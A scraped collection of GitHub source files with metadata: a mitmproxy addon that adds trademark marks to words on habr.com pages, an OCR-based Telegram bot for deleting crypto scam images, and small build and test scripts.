"text": "# coding: utf-8\nfrom mitmproxy import ctx\nfrom mitmproxy.net.http import parse_content_type\nfrom mitmproxy.utils import human\nimport mitmproxy\n\nfrom habr_proxy.modifiers import BaseModificationManager\n\n\nclass ModifyHTMLContent:\n\n \"\"\"Mitmdump scenario for HTML content modification.\"\"\"\n\n def __init__(self, manager: BaseModificationManager) -> None: # noqa: D107\n super().__init__()\n self.manager = manager\n\n def response(self, flow: mitmproxy.http.HTTPFlow):\n \"\"\"Response processing.\n\n Full HTTP response has already been read here.\n \"\"\"\n ident = (len(human.format_address(flow.client_conn.address)) - 2)\n\n if 'html' in parse_content_type(flow.response.headers['Content-type']):\n modified_content = self.manager.process(flow.response.text)\n flow.response.text = modified_content\n ctx.log.info(f'{\" \" * ident} << HTML modification done.')\n"
},
{
"alpha_fraction": 0.5970606207847595,
"alphanum_fraction": 0.6027250289916992,
"avg_line_length": 29.101383209228516,
"blob_id": "e18af86b2d6212b13cccb89be652fed6cfec3330",
"content_id": "a11b500f5668292c2ac8f04f0f42cb5b29a7805b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6546,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 217,
"path": "/src/habr_proxy/modifiers.py",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom abc import ABCMeta\nfrom abc import abstractmethod\nfrom operator import methodcaller\nfrom typing import Any\nfrom typing import AnyStr\nfrom typing import Iterable\nfrom typing import List\nfrom typing import Match\nfrom typing import Pattern\nfrom typing import Type\nimport re\n\nfrom mitmproxy import ctx\n\n\ndef get_tm_transform_re() -> Pattern[AnyStr]:\n \"\"\"Get compiled Tm transformation regex.\"\"\"\n # base rule for 6-letter word\n word = r'([^\\W\\d_]{6})'\n\n # negative look ahead\n delimiters = r'.,:;'\n close_literals = r'\\)\\]\\}\\'\\”\\\"`»/\\\\'\n\n word_continue = f'[^\\\\s<{close_literals}{delimiters}]+'\n close_tag = r'[^<]*?>'\n word_delimiter = f'[{delimiters}][^\\\\s<]+'\n negative_ahead = f'(?!{word_continue}|{close_tag}|{word_delimiter})'\n\n # negative look behind\n open_literals = r'\\(\\[\\{\\'\\”\\\"`«/\\\\'\n\n word_begin = f'[^\\\\s>{open_literals}]{{1}}'\n open_tag = r'<'\n negative_behind = f'(?<!{word_begin}|{open_tag})'\n\n return re.compile(f'{negative_behind}{word}{negative_ahead}', re.DOTALL)\n\n\nclass BaseTransformAction(metaclass=ABCMeta):\n\n \"\"\"Base action class for content transformation.\"\"\"\n\n def __init__(self, content: Any) -> None: # noqa: D107\n super().__init__()\n self.content = content\n\n @abstractmethod\n def transform(self) -> Any:\n \"\"\"Abstract method to define data change.\"\"\"\n raise NotImplementedError()\n\n\nclass BaseTransformHtmlAction(BaseTransformAction):\n\n \"\"\"Base action class for HTML content transformation.\"\"\"\n\n @abstractmethod\n def transform(self) -> str:\n \"\"\"Abstract method to define data change.\"\"\"\n raise NotImplementedError()\n\n @staticmethod\n def _get_paired_tag_re(tag: str) -> Pattern[AnyStr]:\n \"\"\"Build paired tag regex.\"\"\"\n regex = r'(<[\\s]*placeholder[^>]*>.*?<[\\s]*?/placeholder[\\s]*?>)'\n regex = regex.replace('placeholder', tag, 2)\n\n return re.compile(regex, re.DOTALL)\n\n @staticmethod\n def _remove_intersected_matches(\n matches: List[Match[AnyStr]]) -> List[Match[AnyStr]]:\n \"\"\"Ensure tag's regex matches not to be intersected.\"\"\"\n if len(matches) < 2:\n return matches\n\n key_func = methodcaller('start', 0)\n matches.sort(key=key_func)\n\n not_intersected_matches = [matches[0]]\n for i in range(1, len(matches)):\n if matches[i].start(0) > matches[i-1].end(0):\n not_intersected_matches.append(matches[i])\n\n return not_intersected_matches\n\n\nclass TmTransformHtmlAction(BaseTransformHtmlAction):\n\n \"\"\"Transformation scenario for 6-letter words with ™ mark.\n\n :Example: python -> python™\n \"\"\"\n\n transform_re = get_tm_transform_re()\n\n # paired tags with content to be excluded from transformations\n excluded_tags = ('script', 'iframe')\n\n def __init__(self, content: str) -> None: # noqa: D107\n super().__init__(content)\n self.excluded_matches = []\n self._collect_excluded_tags()\n self.excluded_matches = self._remove_intersected_matches(\n self.excluded_matches)\n\n def _collect_excluded_tags(self) -> None:\n \"\"\"Gather skipped tag's match objects.\"\"\"\n self.excluded_matches = []\n for tag in self.excluded_tags:\n tag_re = self._get_paired_tag_re(tag=tag)\n match_objects = tag_re.finditer(self.content)\n self.excluded_matches.extend(match_objects)\n\n def transform(self) -> str:\n \"\"\"Modify words of HTML content.\"\"\"\n def word_tm(match_object):\n \"\"\"Change word -> word™.\"\"\"\n word = match_object.group(0)\n\n return word + '™'\n\n result = []\n start_index = 0\n for match in self.excluded_matches:\n transformable_substring = self.content[start_index:match.start(0)]\n result.extend((\n self.transform_re.sub(word_tm, transformable_substring),\n match.group(0)\n ))\n start_index = match.end(0)\n\n transformable_substring = self.transform_re.sub(\n word_tm, self.content[start_index:])\n result.append(transformable_substring)\n\n return ''.join(result)\n\n\nclass UrlTransformHtmlAction(BaseTransformHtmlAction):\n\n \"\"\"Transformation scenario for URL links to point on HabrProxy.\"\"\"\n\n url_re = re.compile(r'(?<=href=\")(https://habr.com)')\n\n def __init__(self, content: str) -> None:\n \"\"\"Initialize action with parsed HTML content.\"\"\"\n super().__init__(content)\n self.link_matches = None\n self._collect_links()\n\n def _collect_links(self) -> None:\n \"\"\"Gather <a></a> tag match objects.\"\"\"\n self.link_matches = []\n tag_re = self._get_paired_tag_re(tag='a')\n match_objects = tag_re.finditer(self.content)\n self.link_matches.extend(match_objects)\n\n def transform(self) -> str:\n \"\"\"Modify links in HTML content to stay at habr-proxy.\"\"\"\n replace_str = self._get_replace_url()\n\n result = []\n start_index = 0\n for match in self.link_matches:\n constant_substring = self.content[start_index:match.start(0)]\n result.extend((\n constant_substring,\n self.url_re.sub(replace_str, match.group(0))\n ))\n start_index = match.end(0)\n\n constant_substring = self.content[start_index:]\n result.append(constant_substring)\n\n return ''.join(result)\n\n @staticmethod\n def _get_replace_url() -> str:\n \"\"\"Collect replace url from config.\"\"\"\n options = dict(ctx.options.items())\n port = options['listen_port']\n replace_str = f'http://127.0.0.1:{port.value}'\n\n return replace_str\n\n\nclass BaseModificationManager(metaclass=ABCMeta):\n\n \"\"\"Base manager class for content modification.\"\"\"\n\n @abstractmethod\n def process(self, content: Any) -> Any:\n \"\"\"Abstract method to process data content.\"\"\"\n raise NotImplementedError()\n\n\nclass HTMLModificationManager(BaseModificationManager):\n\n \"\"\"HTML content modification manager.\"\"\"\n\n def __init__(\n self,\n actions: Iterable[Type[BaseTransformAction]]\n ) -> None: # noqa: D107\n super().__init__()\n self.actions = actions\n\n def process(self, content: str) -> str:\n \"\"\"Run series of transformations on HTML content.\"\"\"\n for action in self.actions:\n step = action(content)\n content = step.transform()\n\n return content\n"
}
] | 8 |
notmyst33d/antimusk
|
https://github.com/notmyst33d/antimusk
|
c4737114cefbb19422d22c28b5d3b73c4e5ac7e9
|
46c79c30c7b9278af1f6ba31048c662bb6350d90
|
977e6acc1a3e013969b3978a2660f649cfeeddac
|
refs/heads/main
| 2023-07-18T04:41:38.747833 | 2021-09-05T18:28:06 | 2021-09-05T18:28:06 | 397,940,885 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6490868926048279,
"alphanum_fraction": 0.6509643197059631,
"avg_line_length": 33.467647552490234,
"blob_id": "5f51f95be22e491eaf9bc1a53c30bf2d4208379c",
"content_id": "92e27bcaed8ed03d8b1c78c082829afb297b9eb3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11726,
"license_type": "no_license",
"max_line_length": 263,
"num_lines": 340,
"path": "/antimusk.py",
"repo_name": "notmyst33d/antimusk",
"src_encoding": "UTF-8",
"text": "import os, pytesseract, uuid, json\nfrom PIL import Image\nfrom pyrogram import Client, filters, idle\nfrom datetime import datetime\n\nempty_chat_data = {\n \"blocked_words\": [],\n \"whitelist\": []\n}\n\nwith open(\"config.json\", \"r\") as f:\n config = json.loads(f.read())\n\ndef dump_config():\n with open(\"config.json\", \"w\") as f:\n f.write(json.dumps(config, indent=4))\n\napp = Client(\"antimusk\", config[\"api_id\"], config[\"api_hash\"], bot_token=config[\"bot_token\"]).start()\nme = app.get_me()\n\ndef split_list(lst, n):\n for i in range(0, len(lst), n):\n yield lst[i:i + n]\n\nasync def check_protected_filter(_, client, message):\n if config[\"chats\"].get(str(message.chat.id)):\n return True\n\nasync def check_authorized_filter(_, client, message):\n if message.from_user:\n if message.from_user.id in config[\"authorized_users\"] or message.from_user.username in config[\"authorized_users\"]:\n return True\n\nasync def check_not_whitelisted_filter(_, client, message):\n if message.from_user:\n if str(message.from_user.id) not in config[\"chats\"].get(str(message.chat.id), empty_chat_data)[\"whitelist\"]:\n return True\n\nasync def check_not_edited_filter(_, client, message):\n if not message.edit_date:\n return True\n\ncheck_protected = filters.create(check_protected_filter)\ncheck_authorized = filters.create(check_authorized_filter)\ncheck_not_whitelisted = filters.create(check_not_whitelisted_filter)\ncheck_not_edited = filters.create(check_not_edited_filter)\n\n# Special filter for unprotected chats\nasync def unprotected_chat(message):\n if message.chat.type == \"private\":\n return True\n\n if not config[\"chats\"].get(str(message.chat.id)):\n await message.reply(\"This chat is not protected, ask bot admins to add it to protected chats.\")\n return True\n else:\n return False\n\n# Special filter for handling admin commands\n# Its not a direct filter because it relies on client.get_chat_member() which can cause FloodWait error if overused\nasync def not_admin(client, message):\n if message.chat.type == \"private\":\n return True\n\n user = await client.get_chat_member(message.chat.id, message.from_user.id)\n if user.status == \"administrator\" or user.status == \"creator\":\n return False\n else:\n return True\n\[email protected]_message(check_not_edited & filters.command([\"start\", f\"start@{me.username}\"]))\nasync def start(client, message):\n if message.chat.type == \"private\":\n buffer = \"Hello, if you would like to add your chat to protected chats, you can ask any one of these bot admins:\\n\"\n\n try:\n users = await client.get_users(config[\"authorized_users\"])\n except:\n return await message.reply(\"Something went wrong while trying to get authorized users, this can happen if you added an ID to your authorized users, tell the user with that ID to interact with the bot, if problem persists check the configuration file\")\n\n for user in users:\n if user.username:\n buffer += f\"• @{user.username}\\n\"\n else:\n buffer += f\"• [{user.first_name}](tg://user?id={user.id})\\n\"\n\n return await message.reply(buffer)\n\[email protected]_message(check_not_whitelisted & check_protected & check_not_edited & filters.photo)\nasync def ocr_search(client, message):\n request_uuid = str(uuid.uuid4())\n target = \"data/\" + request_uuid + \".jpg\"\n\n await message.download(target)\n im = Image.open(target)\n\n tessract_data = pytesseract.image_to_string(im).lower()\n filtered_output = []\n\n for data_entry in tessract_data.split(\" \"):\n filtered_output.extend(data_entry.split(\"\\n\"))\n\n for word in config[\"chats\"][str(message.chat.id)][\"blocked_words\"]:\n if word in filtered_output:\n if not config[\"chats\"][str(message.chat.id)].get(\"silentmode\", False):\n await message.reply(f\"Found blocked word: `{word}`\")\n\n try:\n await message.delete()\n except:\n if not config[\"chats\"][str(message.chat.id)].get(\"silentmode\", False):\n await message.reply(\"Unfortunately i cant delete this message for some reason\")\n\n break\n\n im.close()\n os.remove(target)\n\[email protected]_message(check_authorized & check_not_edited & filters.command([\"reload\", f\"reload@{me.username}\"]))\nasync def reload(client, message):\n global config\n\n with open(\"config.json\", \"r\") as f:\n config = json.loads(f.read())\n\n await message.reply(\"Config successfully reloaded\")\n\[email protected]_message(check_authorized & check_not_edited & filters.command([\"protect\", f\"protect@{me.username}\"]))\nasync def protect(client, message):\n if message.chat.type == \"private\":\n args = message.text.split(\" \")\n\n if len(args) < 2:\n return await message.reply(\"You need to provide chat username or ID\")\n\n try:\n chat = await client.get_chat(args[1])\n except:\n return await message.reply(\"Chat not found, you need to add the bot in the chat\")\n\n chat_id = str(chat.id)\n else:\n chat_id = str(message.chat.id)\n\n if chat_id in config[\"chats\"]:\n return await message.reply(\"This chat is already protected\")\n\n config[\"chats\"][chat_id] = empty_chat_data\n\n dump_config()\n\n await message.reply(\"Added to protected chats\")\n\[email protected]_message(check_authorized & check_not_edited & filters.command([\"unprotect\", f\"unprotect@{me.username}\"]))\nasync def unprotect(client, message):\n if message.chat.type == \"private\":\n args = message.text.split(\" \")\n\n if len(args) < 2:\n return await message.reply(\"You need to provide chat username or ID\")\n\n try:\n chat = await client.get_chat(args[1])\n except:\n return await message.reply(\"Chat not found, you need to add the bot in the chat\")\n\n chat_id = str(chat.id)\n else:\n chat_id = str(message.chat.id)\n\n if chat_id not in config[\"chats\"]:\n return await message.reply(\"This chat is not protected\")\n\n del config[\"chats\"][chat_id]\n\n dump_config()\n\n await message.reply(\"Removed from protected chats\")\n\[email protected]_message(check_not_edited & filters.command([\"blockword\", f\"blockword@{me.username}\"]))\nasync def blockword(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n args = message.text.split(\" \")\n\n if len(args) < 2:\n return await message.reply(\"Please provide a word or a list of words\")\n\n args.pop(0)\n\n for word in args:\n if word.lower() not in config[\"chats\"][str(message.chat.id)][\"blocked_words\"]:\n config[\"chats\"][str(message.chat.id)][\"blocked_words\"].append(word.lower())\n\n dump_config()\n\n await message.reply(\"Added to blocked words\")\n\[email protected]_message(check_not_edited & filters.command([\"unblockword\", f\"unblockword@{me.username}\"]))\nasync def unblockword(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n args = message.text.split(\" \")\n\n if len(args) < 2:\n return await message.reply(\"Please provide a word or a list of words\")\n\n args.pop(0)\n\n for word in args:\n if word.lower() in config[\"chats\"][str(message.chat.id)][\"blocked_words\"]:\n config[\"chats\"][str(message.chat.id)][\"blocked_words\"].remove(word.lower())\n\n dump_config()\n\n await message.reply(\"Removed from blocked words\")\n\[email protected]_message(check_not_edited & filters.command([\"listblockedwords\", f\"listblockedwords@{me.username}\"]))\nasync def listblockedwords(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n buffer = \"Blocked words:\\n\"\n\n for word in config[\"chats\"][str(message.chat.id)][\"blocked_words\"]:\n buffer += f\"• `{word}`\\n\"\n\n await message.reply(buffer)\n\[email protected]_message(check_not_edited & filters.command([\"listwhitelist\", f\"listwhitelist@{me.username}\"]))\nasync def listwhitelist(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n buffer = \"Whitelisted users:\\n\"\n\n user_lists = split_list(config[\"chats\"][str(message.chat.id)][\"whitelist\"], 200)\n\n for user_list in user_lists:\n try:\n users = await client.get_users(user_list)\n for user in users:\n buffer += f\"• `{user.id} ({user.first_name})`\\n\"\n except Exception as e:\n buffer += str(e)\n\n await message.reply(buffer)\n\[email protected]_message(check_not_edited & filters.command([\"whitelist\", f\"whitelist@{me.username}\"]))\nasync def whitelist(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n args = message.text.split(\" \")\n\n if len(args) < 2:\n return await message.reply(\"Please provide a username or ID\")\n\n try:\n user = await client.get_users(args[1])\n except:\n return await message.reply(\"User not found\")\n\n if user.id == me.id:\n return await message.reply(\"I cant whitelist myself\")\n\n if str(user.id) in config[\"chats\"][str(message.chat.id)][\"whitelist\"]:\n return await message.reply(\"This user is already whilelisted\")\n\n config[\"chats\"][str(message.chat.id)][\"whitelist\"].append(str(user.id))\n\n dump_config()\n\n await message.reply(\"User whitelisted\")\n\[email protected]_message(check_not_edited & filters.command([\"unwhitelist\", f\"unwhitelist@{me.username}\"]))\nasync def unwhitelist(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n args = message.text.split(\" \")\n\n if len(args) < 2:\n return await message.reply(\"Please provide a username or ID\")\n\n try:\n user = await client.get_users(args[1])\n except:\n return await message.reply(\"User not found\")\n\n if str(user.id) not in config[\"chats\"][str(message.chat.id)][\"whitelist\"]:\n return await message.reply(\"This user is not whilelisted\")\n\n config[\"chats\"][str(message.chat.id)][\"whitelist\"].remove(str(user.id))\n\n dump_config()\n\n await message.reply(\"User unwhitelisted\")\n\[email protected]_message(check_not_edited & filters.command([\"clearblockedwords\", f\"clearblockedwords@{me.username}\"]))\nasync def clearblockedwords(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n config[\"chats\"][str(message.chat.id)][\"blocked_words\"] = []\n\n dump_config()\n\n await message.reply(\"Blocked words cleared\")\n\[email protected]_message(check_not_edited & filters.command([\"clearwhitelist\", f\"clearwhitelist@{me.username}\"]))\nasync def clearwhitelist(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n config[\"chats\"][str(message.chat.id)][\"whitelist\"] = []\n\n dump_config()\n\n await message.reply(\"Whitelist cleared\")\n\[email protected]_message(check_not_edited & filters.command([\"silentmode\", f\"silentmode@{me.username}\"]))\nasync def silentmode(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n args = message.text.split(\" \")\n\n if len(args) < 2:\n config[\"chats\"][str(message.chat.id)][\"silentmode\"] = not config[\"chats\"][str(message.chat.id)].get(\"silentmode\", False)\n else:\n if args[1].lower() == \"on\":\n config[\"chats\"][str(message.chat.id)][\"silentmode\"] = True\n elif args[1].lower() == \"off\":\n config[\"chats\"][str(message.chat.id)][\"silentmode\"] = False\n else:\n return await message.reply(f\"Unknown value \\\"{args[1]}\\\", please choose on/off\")\n\n dump_config()\n\n if config[\"chats\"][str(message.chat.id)][\"silentmode\"] == True:\n await message.reply(\"Silent mode: on\")\n else:\n await message.reply(\"Silent mode: off\")\n\nprint(\"AntiMusk started\")\nidle()"
},
{
"alpha_fraction": 0.743922233581543,
"alphanum_fraction": 0.7536466717720032,
"avg_line_length": 47.71052551269531,
"blob_id": "7a5ba7ddd4e1b318342c8e8bbcba53a14d782842",
"content_id": "c4aa302e7713833593d20d333fd7f7d44da38757",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1851,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 38,
"path": "/README.md",
"repo_name": "notmyst33d/antimusk",
"src_encoding": "UTF-8",
"text": "# AntiMusk\nSimple bot for deleting crypto scam messages\n\n## How it works\nIt uses Tesseract OCR to scan photos for blocked words, its primarily used to detect and delete photos like this:\n<img src=\"https://i.imgur.com/dRxf1RU.jpg\" width=\"400\">\n\n## Installing\n1. `git clone https://github.com/notmyst33d/antimusk`\n2. `cd antimusk`\n3. Create a copy of `config_template.json` and rename it to `config.json`\n4. Replace `api_id` and `api_hash` in `config.json` with your api_id and api_hash from [my.telegram.org](https://my.telegram.org)\n5. Get your bot token from [@BotFather](https://t.me/BotFather) and replace `bot_token` in `config.json` with that token\n6. `pip install -r requirements.txt`\n7. Install Tesseract (i recommend you to use Tesseract 5 since its faster and more accurate)\n8. Add your username or ID to `authorized_users` in `config.json`\n9. `python antimusk.py`\n10. Add protected chats using `/protect` command\n\nAfter you started the bot it should start waiting for photos in your protected chats, every photo that has a blocked word is saved on your disk and logged to `log.txt`\n\n## Commands\nAll commands only respond to chat admins, except for `/start`, `/protect`, `/unprotect` and `/reload`\n```\n/start - Get start message (only PM)\n/protect - Add chat to protected chats (only for bot admins)\n/unprotect - Remove chat from protected chats (only for bot admins)\n/reload - Reload configuration file (only for bot admins)\n/blockword - Block a word or a list of words\n/unblockword - Unblock a word or a list of words\n/whitelist - Add a user to a whitelist\n/unwhitelist - Remove a user from a whitelist\n/listblockedwords - Get a list of blocked words\n/listwhitelist - Get a list of whitelisted users\n/clearblockedwords - Clear a list of blocked words\n/clearwhitelist - Clear a list of whitelisted users\n/silentmode - Toggle silent mode\n```\n"
}
] | 2 |
redyeti/nlp
|
https://github.com/redyeti/nlp
|
b3dba0f622dc86902ea64b7c234070c63ea6c2b5
|
8878495d1bd754101b592f3d614b754e2c63236d
|
ddba7f1463ad216fd8d8b44e127b376c04ee7b24
|
refs/heads/master
| 2021-01-23T13:16:56.469475 | 2014-12-10T22:33:48 | 2014-12-10T22:33:48 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5789473652839661,
"alphanum_fraction": 0.5993208885192871,
"avg_line_length": 23.54166603088379,
"blob_id": "90bd6e6004d293a38d824922caab703ec7309a52",
"content_id": "3aceb8a0e8b99aaa2c59bac5dc1d5057e7890802",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 589,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 24,
"path": "/fixtest.py",
"repo_name": "redyeti/nlp",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport sys\n\nlines = sys.stdin.readlines()\nfor i in range(len(lines)):\n\ttry:\n\t\tif \"*** NONE ***\" in lines[i+1] and \"*** NONE ***\" in lines[i+2]:\n\t\t\t# ignore \"errors\" where no match expected and no match\n\t\t\tlines[i+1] = \"\"\n\t\t\tlines[i+2] = \"\"\n\t\t\tlines[i+3] = \"\"\n\t\t\tcontinue\n\t\telif \"WARNING 241:\" in lines[i]:\n\t\t\t# ignore WARNING 241\n\t\t\tlines[i+1] = \"\"\n\t\t\tcontinue\n\t\telse:\n\t\t\t# print all other lines\n\t\t\tif lines[i].strip():\n\t\t\t\tprint lines[i].strip()\n\texcept IndexError:\n\t\t# make sure all lines at the end are printed\n\t\tif lines[i].strip():\n\t\t\tprint lines[i].strip()\n"
},
{
"alpha_fraction": 0.6528354287147522,
"alphanum_fraction": 0.6721991896629333,
"avg_line_length": 30.39130401611328,
"blob_id": "a0710f6efaa1f2c24b17743d2608003b5c3f5d79",
"content_id": "18be67984bc1e2354bd1c93cfea231e2f4290fb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 723,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 23,
"path": "/Makefile",
"repo_name": "redyeti/nlp",
"src_encoding": "UTF-8",
"text": "SHELL=/bin/bash\nPCKIMMO = ./repo/pckimmo\nKGEN = ./repo/kgen\nPROJECT = assignment\n\nexport LC_CTYPE = fi_FI.iso88591\n\n.PHONY: kimmo interactive kgen test\n\ninteractive: $(PROJECT)/finnish.rul Makefile\n\t$(PCKIMMO) -r $(PROJECT)/finnish.rul -l $(PROJECT)/finnish.lex\n\nkgen: $(PROJECT)/finnish.rul Makefile\n\n$(PROJECT)/finnish.rul: $(PROJECT)/finnish.kgen Makefile\n\t! ( bash -c \"iconv -f utf8 -t latin1 <$< | $(KGEN) | iconv -f latin1 -t utf8 >$@\" 2>&1 | grep .. && rm $@ )\n\ntest: $(PROJECT)/finnish.rul $(PROJECT)/*.rec $(PROJECT)/test.tak Makefile\n\t$(PCKIMMO) -r $(PROJECT)/finnish.rul -l $(PROJECT)/finnish.lex -t $(PROJECT)/test.tak 2>&1 | ./fixtest.py\n\narchive:\n\t@git status\n\t@git archive --prefix nlp/ -o nlp.tar.bz2 HEAD\t\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5769230723381042,
"avg_line_length": 25,
"blob_id": "e4e6b80fd4e39c5371c89727d23a4a0dce7fcb1a",
"content_id": "51a147d9367cf6e05d8bb24e3d7301275a96d4a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 2,
"path": "/recode.sh",
"repo_name": "redyeti/nlp",
"src_encoding": "UTF-8",
"text": "iconv -f latin1 -t utf8 -o temp~ \"$1\"\nmv temp~ \"$1\"\n"
}
] | 3 |
febrianrachmad/Final_Project
|
https://github.com/febrianrachmad/Final_Project
|
5ced1b8cc9a1cc5f910d2c62e82dc28c3e67a6bc
|
4589840b3ad6ab05cce9d78e033a7ce1a9c0a491
|
2915570053bc60266340b90c88408d53457bce9f
|
refs/heads/master
| 2020-09-24T20:54:14.108702 | 2019-12-04T10:34:33 | 2019-12-04T10:34:33 | 225,841,257 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4172069728374481,
"alphanum_fraction": 0.4289276897907257,
"avg_line_length": 41.13978576660156,
"blob_id": "e7b0787f25246a8af898cad8906349a41b658ac9",
"content_id": "29f1430edd6c43f2f6371ddaa08efe69a4b2e13f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4010,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 93,
"path": "/Coba_Data_Motor.py",
"repo_name": "febrianrachmad/Final_Project",
"src_encoding": "UTF-8",
"text": "import dash\r\nimport dash_table\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nimport pandas as pd\r\nimport plotly.graph_objs as go\r\nfrom dash.dependencies import Input, Output,State\r\n\r\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\r\n\r\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\ndfhonda = pd.read_excel('Penjualan_Motor_20052018.xlsx', index_col = 0)\r\n\r\ndef generate_table(dataframe, page_size = 10):\r\n return dash_table.DataTable(\r\n id = 'dataTable',\r\n columns = [{\"name\": i, \"id\": i} for i in dataframe.columns],\r\n data=dataframe.to_dict('records'),\r\n page_action=\"native\",\r\n page_current= 0,\r\n page_size= page_size,\r\n )\r\n\r\napp.layout = html.Div([\r\n html.H1('Ini Coba Data Motor'),\r\n html.P('Disuruh Sama Mas Cornellius, wkwkwkwkkw'),\r\n html.Div([html.Div(children =[\r\n dcc.Tabs(value = 'tabs', id = 'tabs-1', children = [\r\n dcc.Tab(value = 'Tabel', label = 'DataFrame Table', children =[\r\n html.Center(html.H1('DATAFRAME PENJUALAN MOTOR 2005 - 2018')),\r\n html.Div(children =[\r\n html.Div(children =[\r\n html.P('Penjualan:'),\r\n dcc.Dropdown(value = '', id='filter-penjualan', options = [\r\n {'label':'Honda','value':'Honda'},\r\n {'label':'Yamaha', 'value':'Yamaha'},\r\n {'label':'Suzuki', 'value':'Suzuki'},\r\n {'label':'Kawasaki', 'value':'Kawasaki'},\r\n {'label':'Others', 'value':'Others'},\r\n {'label':'Total', 'value':'Total'},\r\n {'label':'ALL', 'value':''}\r\n\r\n ], className = 'col-3')\r\n ], className = 'row'),\r\n html.Div([\r\n html.P('Max Rows : '),\r\n dcc.Input(\r\n id='filter-row',\r\n type='number',\r\n value=10,\r\n )\r\n ], className = 'row col-3'),\r\n html.Br(),\r\n html.Div(children =[\r\n html.Button('cari dong bos',id = 'filter')\r\n ],className = 'col-4'),\r\n html.Br(), \r\n html.Div(id = 'div-table', children =[generate_table(dfhonda)])\r\n ])\r\n ])\r\n ], \r\n ## Tabs Content Style\r\n content_style = {\r\n 'fontFamily': 'Arial',\r\n 'borderBottom': '1px solid #d6d6d6',\r\n 'borderLeft': '1px solid #d6d6d6',\r\n 'borderRight': '1px solid #d6d6d6',\r\n 'padding': '44px'\r\n })\r\n ])\r\n], style ={\r\n 'maxWidth': '1800px',\r\n 'margin': '0 auto'\r\n })\r\n])\r\n\r\[email protected](\r\n Output(component_id = 'div-table', component_property = 'children'),\r\n [Input(component_id = 'filter', component_property = 'n_clicks')],\r\n [State(component_id = 'filter-penjualan', component_property = 'value'),\r\n State(component_id = 'filter-row', component_property = 'value')]\r\n)\r\n\r\ndef update_table(n_clicks, penjualan, row):\r\n if penjualan == '':\r\n children = [generate_table(dfhonda, page_size = row)]\r\n else:\r\n children = [generate_table(dfhonda[dfhonda['Honda'] == penjualan], page_size = row)] \r\n return children\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)"
}
] | 1 |
hakaesbe/zigbee_server.py
|
https://github.com/hakaesbe/zigbee_server.py
|
5cd9cff81ffc1719bf76f83befba6f5ed8801f9b
|
6c37d23e734366a4c4fab8e9a33264995a7d4b41
|
9d6c3d1b9646be071fcfbe126c4d20a97aa933a4
|
refs/heads/master
| 2021-01-21T19:13:58.983445 | 2017-06-01T19:25:07 | 2017-06-01T19:25:07 | 92,131,658 | 2 | 1 | null | 2017-05-23T05:09:32 | 2017-02-02T16:51:45 | 2015-05-19T09:17:29 | null |
[
{
"alpha_fraction": 0.47999998927116394,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 15.666666984558105,
"blob_id": "d361cfc27e2b724768993af875c28e54fac2225c",
"content_id": "f6a592393c49528a1816667f463444ac56549f24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "hakaesbe/zigbee_server.py",
"src_encoding": "UTF-8",
"text": "eventlet==0.19.0\ngreenlet==0.4.10\npyserial==3.1.1\n"
},
{
"alpha_fraction": 0.38702327013015747,
"alphanum_fraction": 0.4012369215488434,
"avg_line_length": 39.15904235839844,
"blob_id": "e9798e55c4c28d0aeca203ac618c8db41b3ab55b",
"content_id": "19bed11bedb1e6d23b832b2c15d5783a98f0c0b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18433,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 459,
"path": "/zigbee_server.py",
"repo_name": "hakaesbe/zigbee_server.py",
"src_encoding": "UTF-8",
